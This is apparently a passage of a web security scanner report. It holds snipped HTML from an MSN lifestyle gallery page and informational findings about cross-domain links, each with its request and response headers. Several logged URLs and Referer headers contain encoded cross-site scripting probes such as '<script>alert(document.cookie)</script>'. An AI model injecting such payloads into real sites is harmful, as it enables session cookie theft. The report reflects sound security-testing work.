<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26976" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26976" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26976" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26976" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26976" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26976" target="_blank">Reddit</a>
...[SNIP]...
<li class="shareItem shareItem-facebook"><a href="http://www.facebook.com/sharer.php?t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26975%26ocid%3Dfb-share-event" target="_blank">Facebook</a></li><li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?text=Celebrity+Home+Collections&original_referer=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26975%26ocid%3Dtwtr-utweet" target="_blank">Twitter</a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26975" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26975" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26975" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26975" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26975" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26975" target="_blank">Reddit</a>
...[SNIP]...
<li class="shareItem shareItem-facebook"><a href="http://www.facebook.com/sharer.php?t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26974%26ocid%3Dfb-share-event" target="_blank">Facebook</a></li><li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?text=Celebrity+Home+Collections&original_referer=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26974%26ocid%3Dtwtr-utweet" target="_blank">Twitter</a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26974" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26974" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26974" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26974" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26974" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26974" target="_blank">Reddit</a>
...[SNIP]...
<li class="shareItem shareItem-facebook"><a href="http://www.facebook.com/sharer.php?t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3Focid%3Dfb-share-event" target="_blank">Facebook</a></li><li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?text=Celebrity+Home+Collections&original_referer=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3Focid%3Dtwtr-utweet" target="_blank">Twitter</a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery" target="_blank">Reddit</a>
...[SNIP]...
<div class="clover"><img src="http://static.glo.com/cache/img/clear1x1_1293231430.gif"/><span class="petal petalType-want" >
...[SNIP]...
<noscript><img src="http://static.glo.com/photos/Original/28259_Original.jpg" alt="cover image" /></noscript>
...[SNIP]...
<a href="/living/celebrity-home-collections-6350.gallery" ><img src="http://static.glo.com/photos/ImageModule70x75/26984_ImageModule70x75.jpg"/><span>
...[SNIP]...
<a href="/relationships/what-his-dating-past-says-about-him-6438.gallery" ><img src="http://static.glo.com/photos/ImageModule70x75/28273_ImageModule70x75.jpg"/><span>
...[SNIP]...
<a href="/relationships/what-your-personal-trainer-wont-tell-you-6441.gallery" ><img src="http://static.glo.com/photos/ImageModule70x75/28316_ImageModule70x75.jpg"/><span>
...[SNIP]...
<a href="/relationships/what-his-bad-habit-says-about-him-6408.gallery" ><img src="http://static.glo.com/photos/ImageModule70x75/27733_ImageModule70x75.jpg"/><span>
...[SNIP]...
<a href="/living/the-daily-buy-2017.gallery" ><img src="http://static.glo.com/photos/ImageModule70x75/28453_ImageModule70x75.jpg"/><span>
...[SNIP]...
<a href="/relationships/what-your-personal-trainer-wont-tell-you-6441.gallery" ><img src="http://static.glo.com/photos/ImageModule70x75/28316_ImageModule70x75.jpg"/><span>
...[SNIP]...
<a href="/living/celebrity-homes-131-6431.gallery" ><img src="http://static.glo.com/photos/ImageModule70x75/28257_ImageModule70x75.jpg"/><span>
...[SNIP]...
<a href="/style/take-three-6367.gallery" ><img src="http://static.glo.com/photos/ImageModule70x75/27347_ImageModule70x75.jpg"/><span>
...[SNIP]...
<a href="/style/sidewalk-style-6141.gallery" ><img src="http://static.glo.com/photos/ImageModule70x75/23476_ImageModule70x75.jpg"/><span>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=Best+Spring+Trends&FORM=GLOLIF" >Best Spring Trends</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Pink+Eyeshadow&FORM=GLOLIF" >Pink Eyeshadow</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Mr.+Wrong&FORM=GLOLIF" >Mr. Wrong</a></li><li><a href="http://www.bing.com/search?q=Aphrodisiacs&FORM=GLOLIF" >Aphrodisiacs</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Madonna%27s+fashion+line&FORM=GLOLIF" >Madonna's fashion line</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=Best+DIY+tricks&FORM=GLOLIF" >Best DIY tricks</a>
...[SNIP]...
<li><a href="http://fashion.elle.com/blog/2010/03/how-the-stars-align-celebrity-yoga-instructor-kyle-miller.html" >Tips From a Celebrity Yoga Instructor</a>
...[SNIP]...
<li><a href="http://www.elle.com/Astrology-Advice/Horoscopes" >Horoscopes from Elle</a>
...[SNIP]...
<li><a href="http://www.myhomemsn.com/" >Make MSN Your Homepage</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=GLOLIF" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<span class="imgWrap"><img src="http://static.glo.com/photos/ThumbNail/28259_ThumbNail.jpg"></span>
...[SNIP]...
<span class="imgWrap"><img src="http://static.glo.com/photos/ThumbNail/28285_ThumbNail.jpg"></span>
...[SNIP]...
<span class="imgWrap"><img src="http://static.glo.com/photos/ThumbNail/27126_ThumbNail.jpg"></span>
...[SNIP]...
<span class="imgWrap"><img src="http://static.glo.com/photos/ThumbNail/28036_ThumbNail.jpg"></span>
...[SNIP]...
<span class="imgWrap"><img src="http://static.glo.com/photos/ThumbNail/28013_ThumbNail.jpg"></span>
...[SNIP]...
<span class="imgWrap"><img src="http://static.glo.com/photos/ThumbNail/27968_ThumbNail.jpg"></span>
...[SNIP]...
<span class="imgWrap"><img src="http://static.glo.com/photos/ThumbNail/27820_ThumbNail.jpg"></span>
...[SNIP]...
<li class="first">
<a href="http://go.microsoft.com/fwlink/?LinkId=74170">
MSN Privacy
</a>
...[SNIP]...
<li>
<a href="http://feeds.glo.com/rss/all.xml">
RSS
</a>
...[SNIP]...
</div>

<script src="http://static.glo.com/cache/js/1293231430/b21uaXR1cmUuanM..js"></script>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://msnportallille.112.2O7.net/b/ss/msnportallille/1/H.17--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
</script>
<link rel="stylesheet" id="gloSocialCSS" type="text/css" href="http://static.glo.com/cache/css/1293231427/YWRzL2dsb1NvY2lhbC5jc3M..css" /><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" >
...[SNIP]...

17.90. http://gocitykids.parentsconnect.com/data/service-calendar.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gocitykids.parentsconnect.com
Path:	/data/service-calendar.json

Issue detail

The page was loaded from a URL containing a query string:

http://gocitykids.parentsconnect.com/data/service-calendar.json?widget_query=true&zipcode=All&year=2009&month=10&day=12&max=4&widget_category_id=0&widget_category=All&jsoncallback=jsonp1255386312275&_=1255386319932

The response contains the following link to another domain:

http://www.nba.com/timberwolves/promotions/timberwolves_promotions_index.html

Request

GET /data/service-calendar.json?widget_query=true&zipcode=All&year=2009&month=10&day=12&max=4&widget_category_id=0&widget_category=All&jsoncallback=jsonp1255386312275&_=1255386319932 HTTP/1.1
Host: gocitykids.parentsconnect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Language: en
Content-Type: text/json;charset=UTF-8
Content-Length: 20149
Date: Wed, 02 Feb 2011 19:20:46 GMT
Connection: close

jsonp1255386312275(
[{"id":"211700","name":"Groundhog Day (PG)","attractionAlias":"the-colonial-theatre-227-bridge-street-phoenixville-pa-19460-3449-us","phone":"610.917.0223; 610.917.1228","url":"h
...[SNIP]...
<br> Check the <a href=http://www.nba.com/timberwolves/promotions/timberwolves_promotions_index.html target=0 target='_new'>website</a>
...[SNIP]...

17.91. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8042276531249348&format=728x90_as&output=html&h=90&w=728&lmt=1296704839&channel=0484589010&ad_type=text&color_bg=fffeb8&color_border=cccccc&color_link=0088ce&color_text=0088ce&color_url=cccccc&flash=10.1.103&url=http%3A%2F%2Fmedienfreunde.com%2Flab%2Finnerfade%2F&dt=1296683239741&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as_rimg&correlator=1296683239707&frm=0&adk=3410287751&ga_vid=1081738529.1296683240&ga_sid=1296683240&ga_hid=821202468&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=969&ref=http%3A%2F%2Fburp%2Fshow%2F50&fu=0&ifi=2&dtd=3&xpc=GYSrc0QZ5R&p=http%3A//medienfreunde.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://medienfreunde.com/lab/innerfade/%26hl%3Den%26client%3Dca-pub-8042276531249348%26adU%3Dwww.espatial.com/gis-mapping%26adT%3DNeed%2BGIS%2BMapping%2BSoftware%26adU%3Dtripwow.tripadvisor.com/slideshow%26adT%3DCreate%2Ba%2BFree%2BSlideshow%26adU%3Dwww.Smilebox.com%26adT%3DCreate%2Ba%2BDVD%2BSlideshow%26gl%3DUS&usg=AFQjCNGVK-ZAMJK-C5PiVqcX2GxUBeeNjw

Request

GET /pagead/ads?client=ca-pub-8042276531249348&format=728x90_as&output=html&h=90&w=728&lmt=1296704839&channel=0484589010&ad_type=text&color_bg=fffeb8&color_border=cccccc&color_link=0088ce&color_text=0088ce&color_url=cccccc&flash=10.1.103&url=http%3A%2F%2Fmedienfreunde.com%2Flab%2Finnerfade%2F&dt=1296683239741&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as_rimg&correlator=1296683239707&frm=0&adk=3410287751&ga_vid=1081738529.1296683240&ga_sid=1296683240&ga_hid=821202468&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=969&ref=http%3A%2F%2Fburp%2Fshow%2F50&fu=0&ifi=2&dtd=3&xpc=GYSrc0QZ5R&p=http%3A//medienfreunde.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://medienfreunde.com/lab/innerfade/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

17.92. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0993147863874386&format=160x600_as&output=html&h=600&w=160&lmt=1296592129&channel=9785752589&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fwww.ppcse.net&color_bg=ffffff&color_border=ffffff&color_link=0066cc&color_text=000000&color_url=F2F2F2&flash=10.1.103&url=http%3A%2F%2Fwww.montanaplates.com%2F880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html&dt=1296570529554&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=250x250_as%2C250x250_as&correlator=1296570528580&pv_ch=9785752589%2B&frm=0&adk=312808818&ga_vid=630710686.1296570529&ga_sid=1296570529&ga_hid=1306161521&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=1012&fu=0&ifi=3&dtd=2&xpc=PZpCOllSnL&p=http%3A//www.montanaplates.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html%26hl%3Den%26client%3Dca-pub-0993147863874386%26adU%3DBing.com/Shopping%26adT%3DChristmas%2BDinner%2BPlates%26adU%3Dwww.TTUStore.com%26adT%3DHand%2BPainted%2BCups%26adU%3DBecome.com%26adT%3DDinnerware%2BSets%26adU%3Dwww.MadisonAveGifts.Com%26adT%3DVietri%2BShips%2BFree%26adU%3Dwww.PotteryBarn.com%26adT%3DPottery%2BBarn%2BEntertaining%26gl%3DUS&usg=AFQjCNGsaVcLYi7XYy7RmALWbcTQzUXNYw

Request

GET /pagead/ads?client=ca-pub-0993147863874386&format=160x600_as&output=html&h=600&w=160&lmt=1296592129&channel=9785752589&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fwww.ppcse.net&color_bg=ffffff&color_border=ffffff&color_link=0066cc&color_text=000000&color_url=F2F2F2&flash=10.1.103&url=http%3A%2F%2Fwww.montanaplates.com%2F880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html&dt=1296570529554&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=250x250_as%2C250x250_as&correlator=1296570528580&pv_ch=9785752589%2B&frm=0&adk=312808818&ga_vid=630710686.1296570529&ga_sid=1296570529&ga_hid=1306161521&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=1012&fu=0&ifi=3&dtd=2&xpc=PZpCOllSnL&p=http%3A//www.montanaplates.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

17.93. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=468x60_as&output=html&h=60&w=468&lmt=1296698958&channel=2660416438&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D32395144&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358670&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296677358676&frm=0&adk=1439102223&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=1&dtd=314&xpc=uN6le0ACz9&p=http%3A//boardreader.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/images/ainw_000000.gif
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.boardreader.com/domain/2mdn.net/x22%253Febef7%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253E6f696982a6d%253D1%26hl%3Den%26client%3Dca-pub-4537085524273794%26adU%3DPhoenix.edu%26adT%3DUniversity%2Bof%2BPhoenix%25C2%25AE%26adU%3Dwww.Moxiesoft.com%26adT%3DIntegrating%2BLive%2BChat%253F%26gl%3DUS&usg=AFQjCNHfpKjtNW9gM3P_ojfgLn4neVV8eQ

Request

GET /pagead/ads?client=ca-pub-4537085524273794&format=468x60_as&output=html&h=60&w=468&lmt=1296698958&channel=2660416438&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D32395144&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358670&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296677358676&frm=0&adk=1439102223&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=1&dtd=314&xpc=uN6le0ACz9&p=http%3A//boardreader.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

17.94. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=728x90_as&output=html&h=90&w=728&lmt=1296698945&channel=5128047824&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D55134414&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677345923&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as%2C300x250_as&correlator=1296677340510&frm=0&adk=3538353238&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=863073551&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&ref=http%3A%2F%2Fburp%2Fshow%2F43&fu=0&ifi=3&dtd=24&xpc=CAA4nretiy&p=http%3A//boardreader.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/images/ainw_000000.gif
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.boardreader.com/domain/2mdn.net/x22%253Febef7%252522%25253E%25253Cscript%25253Ealert(1)%25253C/script%25253E6f696982a6d%253D1%26hl%3Den%26client%3Dca-pub-4537085524273794%26adU%3Dwww.SageAbra.com%26adT%3DPayroll%2BCheck%2BSoftware%26adU%3DPhoenix.edu%26adT%3DUniversity%2Bof%2BPhoenix%25C2%25AE%26adU%3Dwww.BuyDomains.com%26adT%3DBuy%2BPremium%2BDomain%2BNames%26gl%3DUS&usg=AFQjCNH4Zuiqq7jH8UkAdieQMZ-67Uatpw

Request

